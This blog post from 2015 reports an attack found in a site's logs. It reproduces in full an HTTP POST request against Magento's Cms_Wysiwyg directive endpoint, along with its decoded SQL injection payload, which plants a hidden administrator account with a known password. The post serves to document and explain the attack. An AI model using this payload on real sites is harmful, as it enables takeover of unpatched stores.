Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request

• September 25, 2015
• technology  
• hackers  
• security  

I’ve only seen this attack twice in the past six months (as far back as I keep logs). The first was on 2015-09-15 from domain qs.biz in Russia (RU). The most recent was today, 2015-09-24, from gigaboxhosting.net in US. This was the request:

POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2;
Accept: */*
Content-Length: 1349
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------daadfd20bc730c50

--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="filter"

cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTM…
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="___directive"

e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ==
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="forwarded"

1
--------------------------daadfd20bc730c50--

The ___directive value decodes to

{{block type=Adminhtml/report_search_grid output=getCsvFile}}

The filter value decodes to

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = \t'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':',
@SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'coadmin'),'Firstname');

A google search suggests that this attacker is trying to exploit a vulnerability in the Magento.com CMS products that has already been fixed. The attacker is clearly trying to create an administrator account with a password that they know (“ganteng123”) in order to gain control of the site.

This attack against my server is more sophisticated than the majority of attacks I’ve seen. It’s a variation of a SQL injection attack most notably illustrated by Randall Munroe at his XKCD cartoon “Exploits of a Mom”.